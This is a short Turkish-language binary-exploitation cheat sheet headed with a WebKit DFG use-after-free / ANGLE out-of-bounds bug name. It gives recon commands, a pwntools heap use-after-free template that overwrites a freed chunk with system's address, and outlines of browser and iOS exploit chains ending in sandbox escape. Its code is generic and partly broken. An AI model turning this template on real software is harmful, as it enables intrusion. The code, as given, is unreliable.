Skip to content

Webkit Dfg Store Barrier Uaf Angle Oob

binexp ios

Webkit Dfg Store Barrier Uaf Angle Oob bellek güvenliği istismarı notudur. Protections ölç, primitif kur, kontrol akışını ele geçir.

  1. checksec + mimari + crash yüzeyini çıkar.

  2. Leak veya write primitifini kur.

  3. ROP/hook/AW2E ile kontrol akışı al.

  4. Shell veya flag’i stabilize et.

Terminal window
file ./vuln
Terminal window
checksec --file=./vuln
Terminal window
pwn checksec ./vuln
Terminal window
readelf -l ./vuln | rg -i 'gnu_stack|interp'
Terminal window
readelf -S ./vuln | rg -i 'got|plt|bss|fini'
Terminal window
gdb -q ./vuln
Terminal window
echo "gdb/pwndbg: heap / bins / chunks"
from pwn import *
p=process('./vuln')
def alloc(sz,data=b'A'):
p.sendlineafter(b'>', b'1'); p.sendlineafter(b':', str(sz).encode()); p.sendafter(b':', data)
def free(idx):
p.sendlineafter(b'>', b'2'); p.sendlineafter(b':', str(idx).encode())
alloc(0x28,b"A"); free(0); alloc(0x28,p64(system)); call(0)
dangling pointer → function ptr / fd overwrite
userspace bug → PAC/kASLR bypass → kernel RW → sandbox escape
Terminal window
jtool2 -l binary | head
renderer OOB/UAF → RW → JIT spray → sandbox escape
Terminal window
./chrome --no-sandbox file:///tmp/pwn.html
from pwn import *
context.binary=ell=ELF('./vuln')
p=process('./vuln')
# p=remote('TARGET',1337)
# leak → calc → write → control
p.interactive()
Terminal window
python3 exploit.py
[ ] fingerprint / profil alındı
[ ] primitif veya erişim doğrulandı
[ ] PoC etkiyi gösterdi
[ ] kanıt paketlendi
[ ] sonraki pivot not edildi